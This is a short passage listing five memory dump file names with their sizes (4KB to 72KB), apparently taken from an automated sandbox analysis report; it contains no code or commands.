                                                                                                                                                                                                                                                  • memory/6348-541-0x0000000005460000-0x0000000005461000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/6356-459-0x0000000001800000-0x0000000001810000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/6356-468-0x0000000001820000-0x0000000001832000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                                  • memory/6412-578-0x0000000004C50000-0x0000000004C51000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/6960-531-0x000000001B7C0000-0x000000001B7C2000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    8KB